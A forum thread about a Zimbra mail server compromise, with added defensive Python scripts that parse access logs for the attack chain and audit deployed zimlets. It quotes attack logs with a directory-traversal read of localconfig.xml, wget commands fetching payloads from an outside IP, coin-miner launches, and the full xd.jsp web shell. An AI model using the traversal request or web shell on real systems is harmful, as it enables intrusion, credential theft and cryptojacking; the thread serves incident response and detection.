Thread: Zimbra hack

  #1 jan.pekar, Beginner Member (joined Jan 2014)

    Zimbra hack

    Yesterday I noticed a hack of my Zimbra server.
    I have attached the access log of the Zimbra server.
    It looks like the hacker uses some vulnerability in Zimbra scripts to upload files to /var/tmp/ and execute them as the "zimbra" user. In my case, some CPU-mining scripts.
    I have Zimbra version 7.2.2_GA_2852. Zimbra 8.0.4.GA.5737 seems unaffected (yet).
    I know that I should upgrade, so consider this a question: are newer versions susceptible to this attack, or are they "safe"? Which version should I install? Is the community aware of this security problem? Is there any quick fix for this (except blocking Zimbra's port 7071 from the Internet)?
    __MYIP__ replaces my server's IP.

    Thank you very much for your reaction.
    Jan Pekar @ Imatic

    179.43.141.149 - - [31/Dec/2013:14:24:04 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:04 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:05 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 976 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:05 +0000] "POST /service/admin/soap HTTP/1.1" 200 530 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:06 +0000] "POST /service/admin/soap HTTP/1.1" 200 9624 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:08 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:10 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 247 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:12 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
    179.43.141.149 - - [31/Dec/2013:14:24:14 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 200 184 "-" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:16 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fxd.pl HTTP/1.1" 200 253 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:19 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa HTTP/1.1" 200 246 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fxd.pl" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:20 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 246 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:22 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 228 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:23 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=killall+-9+a+b+minerd+minerd32+minerd64+perl HTTP/1.1" 500 7009 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:43 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=perl+%2Fvar%2Ftmp%2Fxd.pl HTTP/1.1" 200 217 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:23 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=%2Fvar%2Ftmp%2Fa+-B+-o+stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73"
    179.43.141.149 - - [31/Dec/2013:14:24:33 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=%2Fvar%2Ftmp%2Fb+-B+-o+stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "http://__MYIP__/zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73"

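The access log in the post above shows the whole chain in sequence: a directory-traversal read of /opt/zimbra/conf/localconfig.xml through the skin parameter (with a trailing %00), calls to the admin SOAP endpoint, an upload followed by DeployZimletRequest, and then shell commands fed to the deployed xd.jsp. What follows is an added example, not code from the original post or from Zimbra: a small detector that parses such log lines, tags each stage, checks whether a single source IP completed the full read-deploy-command chain, and pulls the download and mining-pool indicators out of the decoded commands. The sample lines are constructed from the post's log (user agents shortened, line-wrap spaces removed) plus one benign /res/ request that must not be flagged; the stage names and the chain definition are this example's own choices.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: lines modelled on the access log in post #1 (user agents shortened),
# plus one benign /res/ request from another address that must not be flagged.
SAMPLE_LOG = r'''
179.43.141.149 - - [31/Dec/2013:14:24:04 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:05 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 976 "-" "Mozilla/5.0"
179.43.141.149 - - [31/Dec/2013:14:24:05 +0000] "POST /service/admin/soap HTTP/1.1" 200 530 "-" "Mozilla/5.0"
179.43.141.149 - - [31/Dec/2013:14:24:08 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0"
179.43.141.149 - - [31/Dec/2013:14:24:10 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 247 "-" "Mozilla/5.0"
179.43.141.149 - - [31/Dec/2013:14:24:16 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fxd.pl HTTP/1.1" 200 253 "-" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:22 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 228 "-" "WWW-Mechanize/1.73"
179.43.141.149 - - [31/Dec/2013:14:24:23 +0000] "GET /zimlet/com_zimbra_example_simplejspaction2/xd.jsp?comment=%2Fvar%2Ftmp%2Fa+-B+-o+stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "-" "WWW-Mechanize/1.73"
10.0.0.5 - - [31/Dec/2013:14:25:00 +0000] "GET /res/TemplateMsg.js.zgz?skin=carbon HTTP/1.1" 200 976 "-" "Mozilla/5.0"
'''

# Combined log format: ip ident user [ts] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The three stages that together make up the chain seen in the post (names chosen here).
STAGES = ('lfi_skin_traversal', 'zimlet_deploy', 'zimlet_jsp_command')

# Anything in a decoded command that is worth blocking or hunting for elsewhere.
IOC_RE = re.compile(r'(?:https?|stratum\+tcp)://[^\s"\']+|/var/tmp/\S+')


def parse_line(line):
    """Split one access log line into fields; None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    url = urlsplit(rec['target'])
    rec['path'] = url.path
    # parse_qs percent-decodes values and turns '+' into spaces, giving the literal command text.
    rec['query'] = parse_qs(url.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return (stage, detail) for a record that belongs to the attack, else None."""
    path, query = rec['path'], rec['query']
    if path.startswith('/res/') and 'skin' in query:
        skin = query['skin'][0]
        # Stage 1: the skin name is used to build a file path; '..' or a NUL byte is never legitimate.
        if '..' in skin or '\x00' in skin:
            return 'lfi_skin_traversal', skin.replace('\x00', '%00')
    if path == '/service/upload':
        return 'file_upload', ''
    if path == '/service/admin/soap/DeployZimletRequest':
        # Stage 2: a zimlet package being deployed through the admin SOAP API.
        return 'zimlet_deploy', ''
    if path.startswith('/zimlet/') and path.endswith('.jsp') and query:
        # Stage 3: parameters handed to a JSP inside a zimlet; decoded, these are the shell commands.
        return 'zimlet_jsp_command', '; '.join(f'{k}={v[0]}' for k, v in query.items())
    return None


def detect(log_text):
    """Run every line through the classifier and return the hits in log order."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line.strip())
        if rec is None:
            continue
        tagged = classify(rec)
        if tagged is not None:
            tag, detail = tagged
            hits.append({'ip': rec['ip'], 'ts': rec['ts'], 'status': rec['status'],
                         'tag': tag, 'detail': detail})
    return hits


def attack_chains(hits):
    """Source IPs that completed all three stages: config read, zimlet deploy, command execution."""
    seen = {}
    for h in hits:
        seen.setdefault(h['ip'], set()).add(h['tag'])
    return {ip: sorted(tags) for ip, tags in seen.items() if all(s in tags for s in STAGES)}


def extract_iocs(hits):
    """Download URLs, pool addresses and dropped file paths taken from the decoded commands."""
    iocs = set()
    for h in hits:
        if h['tag'] == 'zimlet_jsp_command':
            iocs.update(IOC_RE.findall(h['detail']))
    return sorted(iocs)


if __name__ == '__main__':
    found = detect(SAMPLE_LOG)
    for h in found:
        print(h['ts'], h['ip'], h['status'], h['tag'], h['detail'])
    print('full chain from:', list(attack_chains(found)))
    print('IOCs:', extract_iocs(found))
```

Run it against the real mailboxd access log (zmmailboxd access logs under /opt/zimbra/log) to get the same three columns; an IP that shows only the /res/ traversal stage still matters, because the localconfig.xml read on its own gives away the LDAP password that the later admin SOAP calls rely on.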
  #2 phoenix, Zimbra Consultant & Moderator, Vannes, France (joined Sep 2005)

    Quote Originally Posted by jan.pekar:
        I know that I should upgrade, ...
    Then do so (immediately) after taking a backup, read the recent announcements, and post again if you still have problems.
    Regards
    Bill



  #3 kero99, New Member (joined Nov 2011)

    Confirmed, all our Zimbra servers are under attack with a Zimbra exploit. A bitcoin miner in remote execution on all servers:

    zimbra 16208 1 99 Jan01 ? 3-11:09:22 ./minerd32 -B -o stratum+tcp://hecks.ddosdev.com:3334 -u ilovebigdongs.1 -p x
    zimbra 18558 1 99 Jan01 ? 2-07:52:03 ./minerd64 -B -o stratum+tcp://hecks.ddosdev.com:3334 -u ilovebigdongs.1 -p x

    Best Regards

  #4 timok, Starter Member (joined Jan 2014)

    Next to this minerd, we had two additional zimlets installed: com_zimbra_example_simplejspaction and com_zimbra_example_simplejspaction2.
    The included "cmd.jsp" and "xd.jsp" write GET content to a file:

    cat com_zimbra_example_simplejspaction2/xd.jsp
    Code:
    <%@ page import="java.util.*,java.io.*"%>
    <% %>
    <HTML>
    <BODY>
    <FORM METHOD="GET" NAME="comments" ACTION="">
    <INPUT TYPE="text" NAME="comment">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <%
    // Whatever arrives in the "comment" query parameter is handed to Runtime.exec() unchanged,
    // so it runs as the user the mailbox JVM runs as (zimbra); stdout is echoed back into the page.
    if (request.getParameter("comment") != null) {
        out.println("Command: " + request.getParameter("comment") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("comment"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) { out.println(disr); disr = dis.readLine(); }
    }
    %>
    </pre>
    <p>loldongs</p>
    </BODY>
    </HTML>

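The two rogue zimlets in the post above were found by hand. The script below is an added example, not code from the post or from Zimbra, that turns the same hunt into a check you can run on every server: it lists each directory under the deployed-zimlets directory, marks any that has no matching <name>.zip among the shipped packages, and greps each zimlet's JSP files for Runtime.exec or ProcessBuilder. The layout it assumes (shipped packages as /opt/zimbra/zimlets/<name>.zip, unpacked deployed zimlets under /opt/zimbra/zimlets-deployed/<name>/) is this example's own assumption; the fixture it builds in a temporary directory, including a shortened copy of the xd.jsp shell, is constructed for the demonstration.

```python
import os
import re
import tempfile

# Markers of command execution inside a JSP, as in the xd.jsp shell quoted above.
EXEC_RE = re.compile(r'Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|new\s+ProcessBuilder\s*\(')


def shipped_zimlets(zimlets_dir):
    """Zimlets that came with the install: the <name>.zip packages in zimlets_dir (assumed layout)."""
    return {fn[:-4] for fn in os.listdir(zimlets_dir) if fn.endswith('.zip')}


def exec_jsps(zimlet_dir):
    """Relative paths of JSP files under zimlet_dir that can run OS commands."""
    hits = []
    for root, _dirs, files in os.walk(zimlet_dir):
        for fn in sorted(files):
            if not fn.lower().endswith('.jsp'):
                continue
            full = os.path.join(root, fn)
            with open(full, encoding='utf-8', errors='replace') as fh:
                if EXEC_RE.search(fh.read()):
                    hits.append(os.path.relpath(full, zimlet_dir))
    return hits


def audit(deployed_dir, zimlets_dir):
    """One row per deployed zimlet: whether it is a shipped package and which of its JSPs exec commands."""
    shipped = shipped_zimlets(zimlets_dir)
    rows = []
    for name in sorted(os.listdir(deployed_dir)):
        path = os.path.join(deployed_dir, name)
        if os.path.isdir(path):
            rows.append({'zimlet': name, 'shipped': name in shipped, 'exec_jsp': exec_jsps(path)})
    return rows


def suspicious(rows):
    """Zimlets that were not shipped, or that carry a command-executing JSP (a trojanized stock zimlet)."""
    return [r['zimlet'] for r in rows if not r['shipped'] or r['exec_jsp']]


def build_fixture():
    """Constructed stand-in for /opt/zimbra/zimlets and /opt/zimbra/zimlets-deployed."""
    base = tempfile.mkdtemp(prefix='zimlet-audit-')
    zimlets = os.path.join(base, 'zimlets')
    deployed = os.path.join(base, 'zimlets-deployed')
    os.makedirs(zimlets)
    os.makedirs(deployed)
    # Two "shipped" zimlets: a package zip plus a deployed copy; com_zimbra_url also has a harmless JSP.
    for name in ('com_zimbra_date', 'com_zimbra_url'):
        with open(os.path.join(zimlets, name + '.zip'), 'w'):
            pass
        os.makedirs(os.path.join(deployed, name))
        with open(os.path.join(deployed, name, name + '.xml'), 'w') as fh:
            fh.write('<zimlet name="%s"/>' % name)
    with open(os.path.join(deployed, 'com_zimbra_url', 'help.jsp'), 'w') as fh:
        fh.write('<% out.println("help"); %>\n')
    # Two deployed zimlets with no package and a JSP shell, mirroring the post (shortened xd.jsp).
    shell = ('<%@ page import="java.util.*,java.io.*"%>\n'
             '<% if (request.getParameter("comment") != null) {\n'
             '  Process p = Runtime.getRuntime().exec(request.getParameter("comment")); } %>\n')
    for name, jsp in (('com_zimbra_example_simplejspaction', 'cmd.jsp'),
                      ('com_zimbra_example_simplejspaction2', 'xd.jsp')):
        os.makedirs(os.path.join(deployed, name))
        with open(os.path.join(deployed, name, jsp), 'w') as fh:
            fh.write(shell)
    return deployed, zimlets


if __name__ == '__main__':
    deployed_dir, zimlets_dir = build_fixture()
    rows = audit(deployed_dir, zimlets_dir)
    for row in rows:
        print(row)
    print('suspicious:', suspicious(rows))
```

On a real host, call audit('/opt/zimbra/zimlets-deployed', '/opt/zimbra/zimlets') as the zimbra user; anything listed as suspicious should be removed with zmzimletctl undeploy and the server treated as compromised, since the shell ran with the same rights as the mailbox process.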
  #5 Hien, New Member, HCMC, Viet Nam (joined Dec 2013)

    Quote Originally Posted by kero99:
        Confirmed, all our Zimbra servers are under attack with a Zimbra exploit. A bitcoin miner in remote execution on all servers:

        zimbra 16208 1 99 Jan01 ? 3-11:09:22 ./minerd32 -B -o stratum+tcp://hecks.ddosdev.com:3334 -u ilovebigdongs.1 -p x
        zimbra 18558 1 99 Jan01 ? 2-07:52:03 ./minerd64 -B -o stratum+tcp://hecks.ddosdev.com:3334 -u ilovebigdongs.1 -p x

        Best Regards
    Hello,

    Please visit this thread, zimbra 0-day; it contains a lot of useful information related to your problem.

  #6 phoenix, Zimbra Consultant & Moderator, Vannes, France

    Quote Originally Posted by kero99:
        Confirmed, all our Zimbra servers are under attack with a Zimbra exploit. A bitcoin miner in remote execution on all servers:
    Then you should upgrade to the most recent Zimbra version as soon as possible.
    Regards
    Bill



  #7 kero99, New Member

    Thanks Phoenix, solved by updating to the latest release =)

    Best Regards

  #8 freegenie, Starter Member (joined Jul 2012)

    Hi, I did the upgrade to the latest version of the 7.x branch. Here is my upgrade log:

    1393351008: UPGRADED zimbra-core_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351016: UPGRADED zimbra-ldap_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351023: UPGRADED zimbra-logger_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351037: UPGRADED zimbra-mta_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351045: UPGRADED zimbra-snmp_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351075: UPGRADED zimbra-store_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351084: UPGRADED zimbra-apache_7.2.6_GA_2926.UBUNTU10_64_amd64.deb
    1393351094: UPGRADED zimbra-spell_7.2.6_GA_2926.UBUNTU10_64_amd64.deb

    But the problem is still there. Is the 8.x branch the only one to have a fix for this?
